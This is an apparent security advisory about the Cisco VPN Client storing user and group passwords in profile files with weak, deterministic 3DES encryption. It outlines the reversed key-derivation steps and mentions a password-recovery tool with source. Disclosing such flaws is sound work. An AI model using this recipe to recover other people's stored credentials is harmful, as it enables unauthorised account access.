|
|
| |
| The Cisco VPN Client uses weak encryption to store user and group passwords in your local profile file. |
| |
Credit:
The original article can be found at: http://evilscientists.de/blog/?page_id=343
|
| |
The main problem of the method used to encrypt the passwords is, that the whole procedure is deterministically and no user input is used. This effectively means that the encryption keys the Cisco Client calculates can also be calculated by any other program whensoever this program knows the algorithm. This algorithm was now reversed.
The algorithm:
The algorithm which is used to encrypt a given user/group password is shown below (for further details just visit the source code):
* The current date as a string is retrieved (e.g. Mon Sep 19 20:00:00 2005)
* Then a SHA-1 Hash h1 is computed (20 Bytes)
* h1 is modified and a new Hash h2 is calculated
* h1 is again modified and h3 is calculated
* the 3DES key is made of h2 and the first 4 bytes of h3
* The password is encrypted using 3DES in CBC Mode. The IV consists of the first 8 Bytes from h1.
* The algorithm computes a last hash h4 from the encrypted pasword
* The key enc_UserPassword in our profile file now looks like ths: h1|h4|encrypted password
The Cisco Password Revealer along with the source code can be found here.
|
|
|
|
|
|
|
|
